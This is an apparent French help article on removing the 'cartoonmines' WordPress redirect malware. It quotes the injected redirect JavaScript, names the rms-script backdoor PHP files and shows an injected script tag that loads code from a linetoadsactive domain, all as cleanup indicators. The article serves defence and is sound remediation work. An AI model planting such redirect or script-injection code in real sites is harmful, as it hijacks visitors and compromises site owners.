Malware cartoonmines : c’est quoi ?
Nous avons reçu le message suivant :
J’ai un site web hébergé sur un serveur AWS utilisant l’image Bitnami Nginx et WordPress.
Récemment, toutes nos publicités sur Google ont été suspendues en raison d’un contenu malveillant. Étrangement, cette fois-ci, c’est plus compliqué que le malware typique avec des fichiers infectés. Lors de la visite du site en mode incognito, le premier clic (et seulement le premier) est redirigé via le code suivant:
window.location.replace(“https://cartoonmines.com/scount”); window.location.href = “https://cartoonmines.com/scount”;
Ce code est injecté sur n’importe quel lien. Cependant, après avoir inspecté le code chargé, il ne semble pas être injecté sur la page.
J’ai cherché dans le thème, les plugins, les fichiers principaux et je n’ai rien trouvé!
J’ai remplacé et réinstallé les fichiers principaux de WordPress, désactivé tous les plugins et même changé le thème – le problème persiste. Je ne trouve aucun fichier .htaccess caché dans le répertoire racine.
J’ai même utilisé GREP pour essayer de trouver quelque chose de suspect (quelqu’un a-t-il des indices à ce sujet?) mais sans succès jusqu’à présent.
Le site est toujours affecté par ce problème, donc vous pouvez facilement charger le lien ~ j’utilise malwarebytes pour me protéger, au cas où vous ouvririez ce lien directement.
Quelqu’un peut-il aider? Le code de redirection est implanté dans /wp-includes/js/wp-emoji-release.min.js.
Comment vérifier :
- Observez les cookies lors du clic sur une page interne : un nouveau cookie est créé pour suivre les premiers clics, nommé ht_rr.
- Sauvegardez la page web complète localement, chargez-la et vérifiez dans les outils de développement de Chrome : vous verrez que dans l’onglet Console, il y a une erreur concernant ce fichier Javascript essayant de créer le cookie mentionné.
- Bien qu’une résolution temporaire consistant à supprimer le fichier résolve le problème pendant un certain temps…
Il n’y a aucune excuse pour ne pas configurer correctement un serveur. Bitnami ou d’autres “excellentes piles” ne sont pas suffisantes du point de vue de la sécurité. Elles existent pour une configuration “rapide”, mais pas “de qualité”, et bien sûr, elles ne seront jamais totalement sécurisées.
Le fichier a été créé d’une manière ou d’une autre / avait des droits d’écriture. Cela indique généralement un problème de configuration. À moins que vous n’utilisiez des plugins piratés ou issus de sources douteuses.
Encore une fois, étant donné que le site a été compromis, la suppression du fichier Javascript ne signifie pas une désinfection complète. Pour garantir une sécurité, je recommanderais de tout configurer dans un environnement serveur propre avec des permissions PHP-FPM strictes, et de rechercher des erreurs d’écriture pour trouver des fichiers PHP infectés.
Malware cartoonmines : ce qu’il faut faire
J’ai eu le même problème avec le plugin Zend Font, comme certaines personnes l’avaient mentionné précédemment.
J’ai installé Wordfence et c’est ce qui est ressorti. J’ai supprimé le plugin et maintenant le site fonctionne parfaitement. Désactivez les plugins et vérifiez à nouveau. Changez le nom d’utilisateur et le mot de passe de la base de données. Demandez au responsable de l’hébergement de vérifier l’hôte.
Sinon voici ce qu’il faut faire pour résoudre le problème du malware de redirection cartoonmines :
Supprimer la porte dérobée
Dans la plupart des cas que nous avons observés, cette attaque provient de plugins WordPress non licenciés/non officiels ou piratés qui regroupent les fichiers php suivants utilisés comme porte dérobée pour accéder à votre site :
rms-script-ini.php rms-script-mu-plugin.php rms_unique_wp_mu_pl_fl_nm.php
La première étape consiste à rechercher sur votre serveur chaque instance de ces fichiers et à les supprimer, ainsi que toutes les lignes de code dans les fichiers qui les référencent. Notez que si quelqu’un visite votre site, les fichiers seront régénérés à moins de supprimer ces 3 fichiers – vous devrez donc vérifier à la fin de ce processus qu’ils ont bien été supprimés.
- Un mot de prudence – la suppression de ces 3 fichiers peut provoquer une erreur critique dans WordPress, car les plugins compromis avec lesquels ils ont été groupés essaieront toujours de les appeler. Vous devez soit remplacer le plugin en question par la version sous licence appropriée du vendeur, soit supprimer le code des fichiers du plugin qui fait référence aux fichiers ci-dessus, soit désactiver complètement le plugin pour éviter ce scénario.
Recherchez dans la base de données le script de redirection injecté
Cette maudite redirection infecte non seulement les fichiers php, mais injecte également le script de redirection dans votre base de données WordPress. Vous devez vous connecter à phpmyadmin et rechercher votre base de données wp pour les chaînes “linetoadsactive” ou “lovegreenpencils” selon celle à laquelle votre site redirige. Vous obtiendrez probablement de nombreux résultats dans wp_posts, ainsi que le paramètre d’URL de votre site dans wp_options. La première étape est de restaurer l’URL de votre site dans les tables wp_options. Copiez ensuite la chaîne trouvée dans votre table wp_posts, qui devrait ressembler à ceci :
< script type=’text/javascript’ src=’https://trend.linetoadsactive.com/m.js?n=ns1′> < /script>
Maintenant, effectuez une recherche & remplace SQL pour toutes les instances de la chaîne que vous avez trouvée, en la remplaçant par rien. N’oubliez pas de le faire pour chaque installation de WordPress sur votre serveur.
Recherchez dans les fichiers php & html le code malveillant
Vous devez maintenant utiliser des commandes ssh pour rechercher “linetoadsactive” et “lovegreenpencils” dans tous vos fichiers php & html. Les résultats obtenus devraient ressembler au code injecté dans votre base de données.